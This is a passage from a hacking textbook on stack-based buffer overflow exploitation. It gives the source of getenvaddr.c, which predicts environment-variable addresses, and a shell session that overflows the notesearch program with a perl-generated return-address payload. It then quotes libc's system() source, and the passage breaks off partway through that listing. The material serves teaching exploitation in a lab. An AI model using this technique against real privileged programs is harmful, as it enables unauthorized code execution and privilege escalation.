Graphics Programs Reference
In-Depth Information
int main(int argc, char *argv[]) {
char *ptr;
if(argc < 3) {
printf("Usage: %s <environment var> <target program name>\n", argv[0]);
exit(0);
}
ptr = getenv(argv[1]); /* Get env var location. */
ptr += (strlen(argv[0]) - strlen(argv[2]))*2; /* Adjust for program name. */
printf("%s will be at %p\n", argv[1], ptr);
}
When compiled, this program can accurately predict where an environ-
ment variable will be in memory during a target program's execution. This
can be used to exploit stack-based buffer overflows without the need for a
NOP sled.
reader@hacking:~/booksrc $ gcc -o getenvaddr getenvaddr.c
reader@hacking:~/booksrc $ ./getenvaddr SLEDLESS ./notesearch
SLEDLESS will be at 0xbfffff3c
reader@hacking:~/booksrc $ ./notesearch $(perl -e 'print "\x3c\xff\xff\xbf"x40')
[DEBUG] found a 34 byte note for user id 999
[
DEBUG] found a 41 byte note for user id 999
As you can see, exploit code isn't always needed to exploit programs. The
use of environment variables simplifies things considerably when exploiting
from the command line, but these variables can also be used to make exploit
code more reliable.
The
system()
function is used in the notesearch_exploit.c program to
execute a command. This function starts a new process and runs the com-
mand using
/bin/sh -c
. The
-c
tells the
sh
program to execute commands
from the command-line argument passed to it. Google's code search can
be used to find the source code for this function, which will tell us more.
Go to http://www.google.com/codesearch?q=package:libc+system to see
this code in its entirety.
Code from libc-2.2.2
int system(const char * cmd)
{
int ret, pid, waitstat;
void (*sigint) (), (*sigquit) ();
if ((pid = fork()) == 0) {
execl("/bin/sh", "sh", "-c", cmd, NULL);
exit(127);
}
if (pid < 0) return(127 << 8);
sigint = signal(SIGINT, SIG_IGN);
sigquit = signal(SIGQUIT, SIG_IGN);
while ((waitstat = wait(&ret)) != pid && waitstat != -1);
if (waitstat == -1) ret = -1;
